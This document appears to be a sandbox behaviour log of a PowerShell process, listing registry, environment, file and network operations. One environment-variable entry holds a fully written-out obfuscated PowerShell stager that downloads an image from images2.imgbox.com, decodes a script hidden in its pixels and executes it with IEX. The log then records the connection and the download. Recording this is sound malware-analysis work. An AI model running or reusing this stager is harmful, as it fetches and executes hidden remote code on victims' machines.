Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1024, size_out = 79	1	Fn Data
File	Read	filename = STD_INPUT_HANDLE, size = 1024, size_out = 0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn

Thread 0xb98

49

5

»

Category	Operation	Information	Count	Logfile
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn

Thread 0x780

119

191

»

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	22	Fn
Environment	Get Environment String	name = ComsPec, result_out = C:\Windows\system32\cmd.exe	2	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Environment	Get Environment String	name = sULrV	1	Fn
Environment	Get Environment String	name = sULrV, result_out = . ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'ype -As'+'sembly'+'Name 9axSystem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr Syste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr By'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[Syst'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36))	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes	2	Fn
File	Create	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type	2	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459	1	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 0	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY	2	Fn Data
Module	Create Mapping	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	-	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = images2.imgbox.com, address_out = 66.254.122.104, 66.254.122.100, 66.254.122.102	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Connect	remote_address = 66.254.122.104, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 122, size_out = 122	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 93, size_out = 93	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4588, size_out = 4588	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 331, size_out = 331	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4, size_out = 4	1	Fn Data
Socket	Send	flags = NO_FLAG_SET, size = 134, size_out = 134	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 117, size_out = 117	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 176, size_out = 176	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 160, size_out = 160	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1440, size_out = 1440	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 160, size_out = 160	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 16416	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 2782	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 13634, size_out = 8928	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4706, size_out = 1452	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3254, size_out = 3254	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 9060	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 7356, size_out = 3472	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3884, size_out = 3884	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 1351	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 2297, size_out = 2297	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 9314	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 7102, size_out = 7102	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 16416	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 16416	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 16416	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 13234	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3182, size_out = 3182	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 4776	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 11640, size_out = 11640	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 5030	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 11386, size_out = 3472	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 7914, size_out = 5240	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 2674, size_out = 2674	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 3832	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 12584, size_out = 12584	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 9010	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 7406, size_out = 3472	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3934, size_out = 3220	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 714, size_out = 714	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 16416	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 16416	1	Fn Data
